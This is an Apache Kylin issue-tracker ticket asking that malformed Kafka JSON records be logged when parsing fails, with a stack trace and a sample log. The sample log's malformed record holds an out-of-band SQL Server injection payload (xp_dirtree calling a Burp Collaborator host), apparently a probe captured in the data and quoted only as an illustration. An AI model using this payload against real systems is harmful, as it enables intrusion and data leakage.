Uploaded image for project: 'Kylin'
  1. Kylin
  2. KYLIN-3767

Print the malformed JSON data consumed from Kafka Topic

    XMLWordPrintableJSON

Details

    • Improvement
    • Status: Closed
    • Major
    • Resolution: Fixed
    • v2.2.0, v2.3.0, v2.4.0
    • None
    • Job Engine
    • None

    Description

      Recently, I found that my cube with streaming data built failed, so I checked the syslog in the failed MR job.

      But the log contents didn't help, which is as follows:

      2019-01-11 15:12:48,774 INFO [main] org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader: kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1537268 
      2019-01-11 15:12:48,776 INFO [main] org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader: kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1537768 
      2019-01-11 15:12:48,778 INFO [main] org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader: kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1538268 
      2019-01-11 15:12:48,781 INFO [main] org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader: kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1538768 
      2019-01-11 15:12:48,783 INFO [main] org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader: kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1539268 
      2019-01-11 15:12:48,787 ERROR [main] org.apache.kylin.source.kafka.TimedJsonStreamParser: error
      org.apache.kylin.job.shaded.com.fasterxml.jackson.core.JsonParseException: Unrecognized character escape 'h' (code 104)
       at [Source: (org.apache.kylin.common.util.ByteBufferBackedInputStream); line: 1, column: 207]
       at org.apache.kylin.job.shaded.com.fasterxml.jackson.core.JsonParser._constructError(JsonParser.java:1804)
       at org.apache.kylin.job.shaded.com.fasterxml.jackson.core.base.ParserMinimalBase._reportError(ParserMinimalBase.java:663)
       at org.apache.kylin.job.shaded.com.fasterxml.jackson.core.base.ParserMinimalBase._handleUnrecognizedCharacterEscape(ParserMinimalBase.java:640)
       at org.apache.kylin.job.shaded.com.fasterxml.jackson.core.json.UTF8StreamJsonParser._decodeEscaped(UTF8StreamJsonParser.java:3243)
       at org.apache.kylin.job.shaded.com.fasterxml.jackson.core.json.UTF8StreamJsonParser._finishString2(UTF8StreamJsonParser.java:2452)
       at org.apache.kylin.job.shaded.com.fasterxml.jackson.core.json.UTF8StreamJsonParser._finishAndReturnString(UTF8StreamJsonParser.java:2407)
       at org.apache.kylin.job.shaded.com.fasterxml.jackson.core.json.UTF8StreamJsonParser.getText(UTF8StreamJsonParser.java:269)
       at org.apache.kylin.job.shaded.com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer$Vanilla.deserialize(UntypedObjectDeserializer.java:672)
       at org.apache.kylin.job.shaded.com.fasterxml.jackson.databind.deser.std.MapDeserializer._readAndBindStringKeyMap(MapDeserializer.java:527)
       at org.apache.kylin.job.shaded.com.fasterxml.jackson.databind.deser.std.MapDeserializer.deserialize(MapDeserializer.java:364)
       at org.apache.kylin.job.shaded.com.fasterxml.jackson.databind.deser.std.MapDeserializer.deserialize(MapDeserializer.java:29)
       at org.apache.kylin.job.shaded.com.fasterxml.jackson.databind.ObjectMapper._readMapAndClose(ObjectMapper.java:4001)
       at org.apache.kylin.job.shaded.com.fasterxml.jackson.databind.ObjectMapper.readValue(ObjectMapper.java:3072)
       at org.apache.kylin.source.kafka.TimedJsonStreamParser.parse(TimedJsonStreamParser.java:112)
       at org.apache.kylin.source.kafka.hadoop.KafkaFlatTableMapper.doMap(KafkaFlatTableMapper.java:87)
       at org.apache.kylin.source.kafka.hadoop.KafkaFlatTableMapper.doMap(KafkaFlatTableMapper.java:48)
       at org.apache.kylin.engine.mr.KylinMapper.map(KylinMapper.java:77)
       at org.apache.hadoop.mapreduce.Mapper.run(Mapper.java:145)
       at org.apache.hadoop.mapred.MapTask.runNewMapper(MapTask.java:793)
       at org.apache.hadoop.mapred.MapTask.run(MapTask.java:341)
       at org.apache.hadoop.mapred.YarnChild$2.run(YarnChild.java:164)
       at java.security.AccessController.doPrivileged(Native Method)
       at javax.security.auth.Subject.doAs(Subject.java:422)
       at org.apache.hadoop.security.UserGroupInformation.doAs(UserGroupInformation.java:1917)
       at org.apache.hadoop.mapred.YarnChild.main(YarnChild.java:158)
      

      Maybe, the malformed json data should be printed in the syslog, which can help me to troubleshooting.

      Just like that:

      ...
      2019-01-11 15:12:48,778 INFO [main] org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader: kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1538268 
      2019-01-11 15:12:48,781 INFO [main] org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader: kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1538768 
      2019-01-11 15:12:48,783 INFO [main] org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader: kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1539268 
      2019-01-11 15:12:48,785 ERROR [main] org.apache.kylin.source.kafka.TimedJsonStreamParser: malformed data: {"site":"10010-2","channel":"3","atime":1547119709319,"userid":"909c1c003ee825fc57c9d1fb20f279091547119221751;declare @q varchar(99);set @q='\\9jtdffd7wspm21e6llv88xu6pxvrji960tyhn.burpcollab'+'orator.net\hsh'; exec master.dbo.xp_dirtree @q;-- "}
      2019-01-11 15:12:48,787 ERROR [main] org.apache.kylin.source.kafka.TimedJsonStreamParser: error
      org.apache.kylin.job.shaded.com.fasterxml.jackson.core.JsonParseException: Unrecognized character escape 'h' (code 104)
       at [Source: (org.apache.kylin.common.util.ByteBufferBackedInputStream); line: 1, column: 207]
      	at org.apache.kylin.job.shaded.com.fasterxml.jackson.core.JsonParser._constructError(JsonParser.java:1804)
      ...
      

      Attachments

        1. KYLIN-3767.master.001.patch
          1 kB
          Temple Zhou

        Issue Links

          Activity

            People

              temple.zhou Temple Zhou
              temple.zhou Temple Zhou
              Votes:
              0 Vote for this issue
              Watchers:
              4 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: